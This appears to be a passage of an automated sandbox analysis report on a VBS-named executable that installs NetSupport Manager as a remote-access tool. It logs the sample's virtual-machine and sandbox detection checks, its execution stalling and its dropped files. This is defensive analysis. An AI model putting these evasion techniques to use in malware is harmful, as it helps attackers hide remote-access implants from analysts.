                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI51C1.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI51C1.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI51C1.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI51C1.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI51C1.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI51C1.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI51C1.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI51C1.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI51C1.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI51C1.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI51C1.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI51C1.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Checks if the current machine is a virtual machine (disk enumeration)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Found stalling execution ending in API Sleep call
                                Source: C:\Windows\Installer\MSI3FCC.tmpStalling execution: Execution stalls by calling Sleep
                                Source: C:\Windows\Installer\MSI264F.tmpStalling execution: Execution stalls by calling Sleepgraph_28-56068
                                Powershell is started from unusual location (likely to bypass HIPS)
                                Source: c:\users\user\desktop\pyyidau.vbs.exeKey value queried: Powershell behaviorJump to behavior
                                Queries memory information (via WMI often done to detect virtual machines)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                                Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PointingDevice
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PointingDevice
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PointingDevice
                                Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                                Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                                Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_SoundDevice
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_SoundDevice
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_SoundDevice
                                Query firmware table information (likely to detect VMs)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSystem information queried: FirmwareTableInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSystem information queried: FirmwareTableInformation
                                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                                Tries to detect virtualization through RDTSC time measurements
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeRDTSC instruction interceptor: First address: 69EAADB3 second address: 69EAADA8 instructions: 0x00000000 rdtsc 0x00000002 pop ebx 0x00000003 mov dword ptr [ebp-08h], eax 0x00000006 mov dword ptr [ebp-04h], edx 0x00000009 mov eax, dword ptr [ebp-08h] 0x0000000c sub eax, dword ptr [ebp-10h] 0x0000000f mov edx, dword ptr [ebp-04h] 0x00000012 sbb edx, dword ptr [ebp-0Ch] 0x00000015 pop ebx 0x00000016 leave 0x00000017 retn 0008h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d mov ecx, edi 0x0000001f mov dword ptr [ebp-18h], eax 0x00000022 mov dword ptr [ebp-14h], edx 0x00000025 call 00007F7CB0B27610h 0x0000002a push ebp 0x0000002b mov ebp, esp 0x0000002d sub esp, 10h 0x00000030 push ebx 0x00000031 push dword ptr [ebp+0Ch] 0x00000034 rdtsc
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeRDTSC instruction interceptor: First address: 6C65ADB3 second address: 6C65ADA8 instructions: 0x00000000 rdtsc 0x00000002 pop ebx 0x00000003 mov dword ptr [ebp-08h], eax 0x00000006 mov dword ptr [ebp-04h], edx 0x00000009 mov eax, dword ptr [ebp-08h] 0x0000000c sub eax, dword ptr [ebp-10h] 0x0000000f mov edx, dword ptr [ebp-04h] 0x00000012 sbb edx, dword ptr [ebp-0Ch] 0x00000015 pop ebx 0x00000016 leave 0x00000017 retn 0008h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d mov ecx, edi 0x0000001f mov dword ptr [ebp-18h], eax 0x00000022 mov dword ptr [ebp-14h], edx 0x00000025 call 00007F7CB12DF450h 0x0000002a push ebp 0x0000002b mov ebp, esp 0x0000002d sub esp, 10h 0x00000030 push ebx 0x00000031 push dword ptr [ebp+0Ch] 0x00000034 rdtsc
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeRDTSC instruction interceptor: First address: 6C65ADB3 second address: 6C65ADA8 instructions: 0x00000000 rdtsc 0x00000002 pop ebx 0x00000003 mov dword ptr [ebp-08h], eax 0x00000006 mov dword ptr [ebp-04h], edx 0x00000009 mov eax, dword ptr [ebp-08h] 0x0000000c sub eax, dword ptr [ebp-10h] 0x0000000f mov edx, dword ptr [ebp-04h] 0x00000012 sbb edx, dword ptr [ebp-0Ch] 0x00000015 pop ebx 0x00000016 leave 0x00000017 retn 0008h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d mov ecx, edi 0x0000001f mov dword ptr [ebp-18h], eax 0x00000022 mov dword ptr [ebp-14h], edx 0x00000025 call 00007F7CB0B27610h 0x0000002a push ebp 0x0000002b mov ebp, esp 0x0000002d sub esp, 10h 0x00000030 push ebx 0x00000031 push dword ptr [ebp+0Ch] 0x00000034 rdtsc
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeMemory allocated: 4380000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeMemory allocated: 4380000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeMemory allocated: 7FB0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeMemory allocated: 7FE0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeMemory allocated: 8040000 memory reserve | memory write watchJump to behavior
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0018D970 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyW,__wcsicoll,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,32_2_0018D970
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeWindow / User API: threadDelayed 5788Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeWindow / User API: threadDelayed 3785Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI20FE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1FDE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1C29.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1F7E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI219F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1EEF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1E8F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\vccorlib140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI23F5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\vcruntime140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI29BD.tmpJump to dropped file
